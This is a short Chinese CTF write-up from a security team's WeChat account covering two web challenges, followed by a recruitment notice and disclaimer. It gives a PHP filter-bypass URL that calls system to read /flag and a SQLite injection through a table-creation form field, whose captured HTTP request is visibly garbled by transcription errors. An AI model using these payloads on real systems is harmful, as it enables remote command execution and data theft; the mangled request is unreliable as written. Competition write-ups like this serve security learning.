点击蓝字 · 关注我们
题目:简单的计算器
进去后发现flag.php计算功能可绕过执行shell
http://eci-2zei447jhyte2gq76fli.cloudeci1.ichunqiu.com/flag.php?search=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag
得到flag
这题存在注入在建表包注入
POST / ?page=build HITP/1.1
Host : eci-2zecngytglno3p52gmqv.cloudecil.ichunqiu.comCont
ent-Length : 89
cache-Control : max-age=o
upgrade-Insecure-Requests: l
origin: http: lleci-2zecngytg1no3p52gmqv.cloudecil.ichunqiu.com
Content -Type: application/x-www-form-urlencoded
User-Agent : Mozilla/5.0 (x11; Linux x86_64) ApplewebKit/537.36(KHTML,like Gecko) chrome/83.0.4103.97 Safari/537.36
Accept :text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=o.9
Referer:http:/leci-2zecngytg1no3p52gmIy.cloudecil.ichunqiu.com/?page=indexAccept -Encoding: gzip, deflate
Accept -Language: en-US,en; q=0.9,zh-CN; q=0.8,zh; q=0.7
Cookie: PHPSESSID=ffb90ec69o5f7bef2a6e8fa2da7o55of; _jsluid_h=beoc26aac69b12099a0b0aa54df37ca2
Connection: close
table_name=aaa as select sql as[ &columns[ o] [ name]=]fronsqlite_master ; &columns[o] [type]-2
获得表名,表列
然后获得flag
flag{914162a9-5a2e-4b80-9d74-93c119a3ef86}
你是否想要加入一个安全团队
拥有更好的学习氛围?
那就加入EDI安全吧,这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。
我们诚招Web、Pwn、Re、Crypto和Blockchain方向的师傅们,不论年龄、不论性别,EDI为大家提供一个共同学习,一同进步的平台。
我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。
有意向的师傅请联系我们的无剧师傅
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
本文始发于微信公众号(EDI安全):全国工业互联网安全技术技能大赛部分wp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论